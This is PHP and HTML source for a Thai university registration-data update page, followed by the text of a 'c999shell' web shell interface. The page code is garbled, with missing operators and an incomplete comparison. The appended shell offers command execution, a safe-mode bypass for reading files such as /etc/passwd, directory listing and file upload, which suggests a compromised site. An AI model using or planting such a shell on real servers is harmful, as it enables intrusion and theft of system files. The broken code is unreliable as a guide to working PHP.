            <td width="580" align="center"><span class="fontMark7">ปรับปรุง<font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"> 
              "<? echo $oUT->nameTable?>" </font> 
            <? if($uptid != 5){
                    echo  
'ในปีภาคการศึกษาที่ '.$oUT->semester.'/'$oUT->acadYear
                }else{
                    echo  
'ในปีการศึกษา '$oUT->acadYear
                }
            
?> 
              <br>
              </span><span class="fontMark7">
              ณ วันที่ <? echo abbreDate2($oUT->dateUp,'/'); ?> <? echo "เวลา" ?><? echo $oUT->timeUp?></span><br>
              <span class = "fontMark2"> เรียบร้อยแล้ว </span></td>
    </tr>
    <? } else if($formUpdate == ) { ?>
    <tr align="center" bgcolor="#FFFFFF">
            <td width="580"align="center"><span class="fontMark7"><b> ไม่สามารถปรับปรุง <? echo $oUT->nameTable?> ได้ 
              </b><br>โปรดปรับปรุงข้อมูลใหม่อีกครั้ง
               </font>
              </span></td>
    </tr>

<?      ?>
    </table>
<?    ?>

  <br>
  <table width="742" border="0">
          <tr> 
            <td height="22"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"><b>หมายเหตุ 
              : </b></font></td>
            <td colspan="2"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"><img src="../picture/edit1.gif" alt="แก้ไขการอัพเดท" border="0" > 
              หมายถึง เลือกเแก้ไขหรือเลือกปรับปรุงข้อมูล โดยข้อมูลจะแบ่งออกเป็น 
              4 ส่วนคือ ข้อมูลนักศึกษา ข้อมูลอาจารย์ ข้อมูลรายวิชา </font></td>
          </tr>
          <tr> 
            <td>&nbsp;</td>
            <td width="15">&nbsp;</td>
            <td width="651"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>">และข้อมูลการลงทะเบียน</font> 
              <font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>">โดยข้อมูลนักศึกษา 
              ข้อมูลอาจารย์ และข้อมูลรายวิชาจะปรับปรุงเป็นปีการศึกษาและภาคการศึกษาปัจจุบัน</font></td>
          </tr>
          <tr> 
            <td>&nbsp;</td>
            <td>&nbsp;</td>
            <td><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>">สำหรับข้อมูลการลงทะเบียน 
              สามารถเลือกปรับปรุงปีการศึกษา และภาคการศึกษาเองได้</font></td>
          </tr>
          <tr> 
            <td width="62">&nbsp;</td>
            <td colspan="2"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"><img src="../picture/save.gif" alt="บันทึกการอัพเดท" border="0" > 
              หมายถึง ยืนยันการบันทึกข้อมูล ซึ่งเมื่อกดยืนยันระบบจะทำการปรับปรุงข้อมูล 
              ซึ่งเมื่อปรับปรุงข้อมูลสำเร็จแล้วจะแสดงผลการบันทึก</font></td>
          </tr>
          <tr> 
            <td>&nbsp;</td>
            <td>&nbsp;</td>
            <td><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"> 
              โดยแสดงเป็นปีการศึกษา ภาคการศึกษา และวันที่/เวลาปรับปรุงล่าสุด ดังตารางข้างบน 
              และจะแสดงข้อความแสดงผลลัพธ์ท้ายตาราง</font></td>
          </tr>
          <tr> 
            <td>&nbsp;</td>
            <td>&nbsp;</td>
            <td><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>">ทั้งในกรณีที่ปรับปรุงข้อมูลสำเร็จหรือไม่สำเร็จ</font></td>
          </tr>
          <tr> 
            <td>&nbsp;</td>
            <td colspan="2">&nbsp;    <font color="#FFFFFF" size="2">
<?php
$filename 
'updateDBRegist.php';
if (
file_exists($filename)) {
    echo 
"$filename was last modified: " date ("F d Y H:i:s."filemtime($filename));
}
?>

    </font></td>
          </tr>
        </table>

</fieldset>
</td></tr>
</table>

</form>
<?php

function formSuccess($msgFlag,$nameTable){
?>
<script language="javascript">
    document.formdata.method.value="FormEnd";
    document.formdata.formUpdate.value=<? echo "'$msgFlag'"?>;
    document.formdata.nameTable.value=<? echo "'$nameTable'"?>;
    document.formdata.submit();
</script>
<?
}
?>

<script language="javascript">
function doFormEdit(i){
        document.formdata.method.value="FormEdit"+i;
        document.formdata.submit();
}

function doFormMain(i,txt1,txt2){
    document.formdata.method.value="FormStart";
    if(i==1){
        if(confirm('ต้องการปรับปรุง'+txt1+' ใช่หรือไม่ !')){
            document.formdata.formUpdate.value="FormStdMaster";
            document.formdata.nameTable.value=txt1;
            document.formdata.uptid.value=i;
            document.formdata.submit();    
        }
    }else if(i == 2){
        if(confirm('ต้องการปรับปรุง'+txt1+' ใช่หรือไม่ !')){
            document.formdata.formUpdate.value="FormOfficer";
            document.formdata.nameTable.value=txt1;
            document.formdata.uptid.value=i;
            document.formdata.submit();    
        }
    }else if(i == 3){
        if(confirm('ต้องการปรับปรุง'+txt1+' ใช่หรือไม่ !')){
            document.formdata.formUpdate.value="FormCourse";
            document.formdata.nameTable.value=txt1;
            document.formdata.uptid.value=i;
            document.formdata.submit();    
        }
    }else if(i == 4){
/*        if(confirm('ต้องการปรับปรุง'+txt1+' ใช่หรือไม่ !')){
            document.formdata.formUpdate.value="FormReg";
            document.formdata.nameTable.value=txt1;
            //document.formdata.submit();    
        }
*/
            if(document.formdata.inputAcadyear.value == ""){
                alert("กรุณากรอกปีการศึกษา !");
            }else{
                var txt3 = document.formdata.inputAcadyear.value;
                var txt4 = document.formdata.selectSemester.value;
                var semName; //= document.formdata.semName.value;

                if(txt4 == 1){
                    semName = "ภาคการศึกษาที่1";
                }else if(txt4 == 2){
                    semName = "ภาคการศึกษาที่2";
                }else if(txt4 == 3){
                    semName = "ภาคฤดูร้อน";
                }
            
                if(confirm('ต้องการปรับปรุงข้อมูลการลงทะเบียนนักศึกษา '+"'ปีการศึกษา"+  txt3 + " " +  semName +"'"+' ใช่หรือไม่ !')){
                    document.formdata.formUpdate.value="FormReg";
                    document.formdata.uptid.value=i;
                    document.formdata.submit();    
                }
            }

    }else if(i == 5){
        if(document.formdata.inputAcadyear.value == ""){
            alert("กรุณากรอกปีการศึกษา !");
        }else{
            var txt3 = document.formdata.inputAcadyear.value;
            if(confirm('ต้องการปรับปรุง'+txt1+"'ปีการศึกษา "+  txt3 + ' ใช่หรือไม่ !')){
                document.formdata.formUpdate.value="FormEsa";
                document.formdata.nameTable.value=txt1;
                document.formdata.uptid.value=i;
                document.formdata.submit();    
            }
        }
    }
}

function doFormAll(){
    document.formdata.method.value="FormStartAll";
    document.formdata.formUpdate.value="FormAll";
    document.formdata.submit();
}

function toggle(target)
{
var row =1;
while (document.getElementById(target+row)) {
    obj=document.getElementById(target+row);
    obj.style.display=( (obj.style.display=='none') ? '' : 'none');
    row++;
 }
}

</script>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0199 ]--